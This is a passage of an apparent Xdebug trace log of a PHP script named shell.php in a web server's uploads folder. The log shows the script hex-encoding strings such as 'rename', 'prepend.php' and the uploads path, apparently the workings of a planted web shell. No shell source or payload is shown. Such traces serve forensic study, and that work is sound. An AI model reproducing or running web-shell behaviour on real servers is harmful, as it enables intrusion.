2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1304 0 0.045488 484840 ord 0 /var/www/html/uploads/shell.php 19 1 'i'
3 1304 1 0.045499 484880
3 1304 R 105
3 1305 0 0.045511 484840 dechex 0 /var/www/html/uploads/shell.php 19 1 105
3 1305 1 0.045522 484912
3 1305 R '69'
2 A /var/www/html/uploads/shell.php 19 $r .= '69'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1306 0 0.045551 484840 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 1306 1 0.045562 484880
3 1306 R 116
3 1307 0 0.045574 484840 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 1307 1 0.045585 484912
3 1307 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1299 1 0.045614 484848
2 1299 R '65646974'
2 1308 0 0.045627 484808 hex 1 /var/www/html/uploads/shell.php 128 1 'prepend.php'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1309 0 0.045657 484808 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1309 1 0.045669 484848
3 1309 R 112
3 1310 0 0.045681 484808 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1310 1 0.045692 484880
3 1310 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1311 0 0.045721 484840 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 1311 1 0.045732 484880
3 1311 R 114
3 1312 0 0.045744 484840 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 1312 1 0.045755 484912
3 1312 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1313 0 0.045790 484840 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1313 1 0.045802 484880
3 1313 R 101
3 1314 0 0.045813 484840 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1314 1 0.045824 484912
3 1314 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1315 0 0.045853 484840 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1315 1 0.045864 484880
3 1315 R 112
3 1316 0 0.045876 484840 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1316 1 0.045887 484912
3 1316 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1317 0 0.045916 484848 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1317 1 0.045926 484888
3 1317 R 101
3 1318 0 0.045938 484848 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1318 1 0.045950 484920
3 1318 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1319 0 0.045978 484848 ord 0 /var/www/html/uploads/shell.php 19 1 'n'
3 1319 1 0.045989 484888
3 1319 R 110
3 1320 0 0.046001 484848 dechex 0 /var/www/html/uploads/shell.php 19 1 110
3 1320 1 0.046012 484920
3 1320 R '6e'
2 A /var/www/html/uploads/shell.php 19 $r .= '6e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1321 0 0.046041 484848 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1321 1 0.046052 484888
3 1321 R 100
3 1322 0 0.046064 484848 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1322 1 0.046075 484920
3 1322 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1323 0 0.046103 484848 ord 0 /var/www/html/uploads/shell.php 19 1 '.'
3 1323 1 0.046115 484888
3 1323 R 46
3 1324 0 0.046126 484848 dechex 0 /var/www/html/uploads/shell.php 19 1 46
3 1324 1 0.046137 484920
3 1324 R '2e'
2 A /var/www/html/uploads/shell.php 19 $r .= '2e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1325 0 0.046166 484856 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1325 1 0.046178 484896
3 1325 R 112
3 1326 0 0.046190 484856 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1326 1 0.046201 484928
3 1326 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1327 0 0.046229 484856 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1327 1 0.046241 484896
3 1327 R 104
3 1328 0 0.046253 484856 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1328 1 0.046264 484928
3 1328 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1329 0 0.046292 484856 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1329 1 0.046304 484896
3 1329 R 112
3 1330 0 0.046315 484856 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1330 1 0.046326 484928
3 1330 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1308 1 0.046355 484856
2 1308 R '70726570656e642e706870'
2 1331 0 0.046369 485000 hex 1 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1332 0 0.046399 485000 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1332 1 0.046410 485040
3 1332 R 47
3 1333 0 0.046422 485000 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1333 1 0.046434 485072
3 1333 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1334 0 0.046463 485032 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 1334 1 0.046478 485072
3 1334 R 118
3 1335 0 0.046490 485032 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 1335 1 0.046502 485104
3 1335 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1336 0 0.046531 485032 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1336 1 0.046542 485072
3 1336 R 97
3 1337 0 0.046554 485032 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1337 1 0.046565 485104
3 1337 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1338 0 0.046594 485032 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 1338 1 0.046605 485072
3 1338 R 114
3 1339 0 0.046617 485032 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 1339 1 0.046628 485104
3 1339 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1340 0 0.046657 485040 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1340 1 0.046668 485080
3 1340 R 47
3 1341 0 0.046680 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1341 1 0.046691 485112
3 1341 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1342 0 0.046719 485040 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1342 1 0.046731 485080
3 1342 R 119
3 1343 0 0.046743 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1343 1 0.046754 485112
3 1343 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1344 0 0.046783 485040 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1344 1 0.046794 485080
3 1344 R 119
3 1345 0 0.046806 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1345 1 0.046817 485112
3 1345 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1346 0 0.046846 485040 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1346 1 0.046857 485080
3 1346 R 119
3 1347 0 0.046869 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1347 1 0.046880 485112
3 1347 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1348 0 0.046908 485048 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1348 1 0.046920 485088
3 1348 R 47
3 1349 0 0.046932 485048 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1349 1 0.046943 485120
3 1349 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1350 0 0.046971 485048 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1350 1 0.046983 485088
3 1350 R 104
3 1351 0 0.046995 485048 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1351 1 0.047006 485120
3 1351 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1352 0 0.047035 485048 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 1352 1 0.047046 485088
3 1352 R 116
3 1353 0 0.047058 485048 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 1353 1 0.047069 485120
3 1353 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1354 0 0.047098 485048 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 1354 1 0.047109 485088
3 1354 R 109
3 1355 0 0.047121 485048 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 1355 1 0.047132 485120
3 1355 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1356 0 0.047160 485056 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1356 1 0.047172 485096
3 1356 R 108
3 1357 0 0.047187 485056 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1357 1 0.047198 485128
3 1357 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1358 0 0.047227 485056 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1358 1 0.047238 485096
3 1358 R 47
3 1359 0 0.047255 485056 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1359 1 0.047267 485128
3 1359 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1360 0 0.047296 485056 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 1360 1 0.047307 485096
3 1360 R 117
3 1361 0 0.047319 485056 dechex 0 /var/www/html/uploads/shell.php 19 1 117
3 1361 1 0.047331 485128
3 1361 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1362 0 0.047360 485056 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1362 1 0.047371 485096
3 1362 R 112
3 1363 0 0.047383 485056 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1363 1 0.047394 485128
3 1363 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1364 0 0.047423 485064 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1364 1 0.047434 485104
3 1364 R 108
3 1365 0 0.047446 485064 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1365 1 0.047457 485136
3 1365 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1366 0 0.047486 485064 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 1366 1 0.047497 485104
3 1366 R 111
3 1367 0 0.047509 485064 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 1367 1 0.047520 485136
3 1367 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1368 0 0.047548 485064 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1368 1 0.047560 485104
3 1368 R 97
3 1369 0 0.047572 485064 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1369 1 0.047583 485136
3 1369 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1370 0 0.047612 485064 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1370 1 0.047624 485104
3 1370 R 100
3 1371 0 0.047636 485064 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1371 1 0.047647 485136
3 1371 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1372 0 0.047675 485080 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1372 1 0.047686 485120
3 1372 R 115
3 1373 0 0.047698 485080 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1373 1 0.047709 485152
3 1373 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1331 1 0.047738 485080
2 1331 R '2f7661722f7777772f68746d6c2f75706c6f616473'
2 1374 0 0.047752 485000 hex 1 /var/www/html/uploads/shell.php 128 1 'rename'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1375 0 0.047782 485000 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 1375 1 0.047794 485040
3 1375 R 114
3 1376 0 0.047806 485000 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 1376 1 0.047817 485072
3 1376 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1377 0 0.047846 485032 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1377 1 0.047857 485072
3 1377 R 101
3 1378 0 0.047869 485032 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1378 1 0.047880 485104
3 1378 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1379 0 0.047915 485032 ord 0 /var/www/html/uploads/shell.php 19 1 'n'
3 1379 1 0.047927 485072
3 1379 R 110
3 1380 0 0.047939 485032 dechex 0 /var/www/html/uploads/shell.php 19 1 110
3 1380 1 0.047950 485104
3 1380 R '6e'
2 A /var/www/html/uploads/shell.php 19 $r .= '6e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1381 0 0.047979 485032 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1381 1 0.047990 485072
3 1381 R 97
3 1382 0 0.048002 485032 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1382 1 0.048014 485104
3 1382 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1383 0 0.048042 485040 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 1383 1 0.048053 485080
3 1383 R 109
3 1384 0 0.048065 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 1384 1 0.048076 485112
3 1384 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1385 0 0.048105 485040 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1385 1 0.048116 485080
3 1385 R 101
3 1386 0 0.048127 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1386 1 0.048138 485112
3 1386 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1374 1 0.048167 485040
2 1374 R '72656e616d65'
2 1387 0 0.048181 485000 hex 1 /var/www/html/uploads/shell.php 128 1 'prepend.php'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1388 0 0.048211 485000 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1388 1 0.048222 485040
3 1388 R 112
3 1389 0 0.048234 485000 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1389 1 0.048245 485072
3 1389 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1390 0 0.048274 485032 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 1390 1 0.048285 485072
3 1390 R 114
3 1391 0 0.048297 485032 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 1391 1 0.048308 485104
3 1391 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1392 0 0.048336 485032 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1392 1 0.048348 485072
3 1392 R 101
3 1393 0 0.048360 485032 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1393 1 0.048370 485104
3 1393 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1394 0 0.048399 485032 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1394 1 0.048410 485072
3 1394 R 112
3 1395 0 0.048422 485032 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1395 1 0.048433 485104
3 1395 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1396 0 0.048461 485040 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1396 1 0.048472 485080
3 1396 R 101
3 1397 0 0.048484 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1397 1 0.048495 485112
3 1397 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1398 0 0.048524 485040 ord 0 /var/www/html/uploads/shell.php 19 1 'n'
3 1398 1 0.048535 485080
3 1398 R 110
3 1399 0 0.048547 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 110
3 1399 1 0.048558 485112
3 1399 R '6e'
2 A /var/www/html/uploads/shell.php 19 $r .= '6e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1400 0 0.048587 485040 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1400 1 0.048601 485080
3 1400 R 100
3 1401 0 0.048613 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1401 1 0.048624 485112
3 1401 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1402 0 0.048653 485040 ord 0 /var/www/html/uploads/shell.php 19 1 '.'
3 1402 1 0.048664 485080
3 1402 R 46
3 1403 0 0.048676 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 46
3 1403 1 0.048687 485112
3 1403 R '2e'
2 A /var/www/html/uploads/shell.php 19 $r .= '2e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1404 0 0.048717 485048 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1404 1 0.048728 485088
3 1404 R 112
3 1405 0 0.048740 485048 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1405 1 0.048751 485120
3 1405 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1406 0 0.048780 485048 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1406 1 0.048791 485088
3 1406 R 104
3 1407 0 0.048803 485048 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1407 1 0.048814 485120
3 1407 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1408 0 0.048843 485048 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1408 1 0.048854 485088
3 1408 R 112
3 1409 0 0.048866 485048 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1409 1 0.048877 485120
3 1409 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1387 1 0.048906 485048
2 1387 R '70726570656e642e706870'
2 1410 0 0.048920 485128 hex 1 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1411 0 0.048950 485128 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1411 1 0.048961 485168
3 1411 R 47
3 1412 0 0.048973 485128 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1412 1 0.048985 485200
3 1412 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1413 0 0.049014 485160 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 1413 1 0.049025 485200
3 1413 R 118
3 1414 0 0.049037 485160 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 1414 1 0.049048 485232
3 1414 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1415 0 0.049077 485160 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1415 1 0.049088 485200
3 1415 R 97
3 1416 0 0.049100 485160 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1416 1 0.049111 485232
3 1416 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1417 0 0.049140 485160 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 1417 1 0.049152 485200
3 1417 R 114
3 1418 0 0.049164 485160 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 1418 1 0.049175 485232
3 1418 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1419 0 0.049203 485168 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1419 1 0.049215 485208
3 1419 R 47
3 1420 0 0.049227 485168 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1420 1 0.049238 485240
3 1420 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1421 0 0.049267 485168 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1421 1 0.049278 485208
3 1421 R 119
3 1422 0 0.049300 485168 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1422 1 0.049318 485240
3 1422 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1423 0 0.049347 485168 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1423 1 0.049359 485208
3 1423 R 119
3 1424 0 0.049371 485168 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1424 1 0.049382 485240
3 1424 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1425 0 0.049410 485168 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1425 1 0.049422 485208
3 1425 R 119
3 1426 0 0.049433 485168 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1426 1 0.049444 485240
3 1426 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1427 0 0.049473 485176 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1427 1 0.049484 485216
3 1427 R 47
3 1428 0 0.049497 485176 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1428 1 0.049508 485248
3 1428 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1429 0 0.049537 485176 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1429 1 0.049548 485216
3 1429 R 104
3 1430 0 0.049560 485176 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1430 1 0.049571 485248
3 1430 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1431 0 0.049600 485176 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 1431 1 0.049611 485216
3 1431 R 116
3 1432 0 0.049623 485176 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 1432 1 0.049634 485248
3 1432 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1433 0 0.049663 485176 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 1433 1 0.049674 485216
3 1433 R 109
3 1434 0 0.049686 485176 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 1434 1 0.049697 485248
3 1434 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1435 0 0.049726 485184 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1435 1 0.049737 485224
3 1435 R 108
3 1436 0 0.049749 485184 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1436 1 0.049760 485256
3 1436 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1437 0 0.049789 485184 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1437 1 0.049800 485224
3 1437 R 47
3 1438 0 0.049812 485184 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1438 1 0.049823 485256
3 1438 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1439 0 0.049852 485184 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 1439 1 0.049863 485224
3 1439 R 117
3 1440 0 0.049875 485184 dechex 0 /var/www/html/uploads/shell.php 19 1 117
3 1440 1 0.049886 485256
3 1440 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1441 0 0.049914 485184 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1441 1 0.049925 485224
3 1441 R 112
3 1442 0 0.049937 485184 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1442 1 0.049948 485256
3 1442 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1443 0 0.049977 485192 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1443 1 0.049988 485232
3 1443 R 108
3 1444 0 0.050000 485192 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1444 1 0.050011 485264
3 1444 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1445 0 0.050042 485192 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 1445 1 0.050053 485232
3 1445 R 111
3 1446 0 0.050065 485192 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 1446 1 0.050076 485264
3 1446 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1447 0 0.050104 485192 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1447 1 0.050115 485232
3 1447 R 97
3 1448 0 0.050127 485192 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1448 1 0.050138 485264
3 1448 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1449 0 0.050166 485192 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1449 1 0.050178 485232
3 1449 R 100
3 1450 0 0.050189 485192 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1450 1 0.050201 485264
3 1450 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1451 0 0.050229 485208 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1451 1 0.050240 485248
3 1451 R 115
3 1452 0 0.050252 485208 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1452 1 0.050263 485280
3 1452 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1410 1 0.050292 485208
2 1410 R '2f7661722f7777772f68746d6c2f75706c6f616473'
2 1453 0 0.050307 485256 hex 1 /var/www/html/uploads/shell.php 128 1 'prepend.php'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1454 0 0.050338 485256 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1454 1 0.050349 485296
3 1454 R 112
3 1455 0 0.050361 485256 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1455 1 0.050372 485328
3 1455 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1456 0 0.050401 485288 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 1456 1 0.050412 485328
3 1456 R 114
3 1457 0 0.050424 485288 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 1457 1 0.050435 485360
3 1457 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
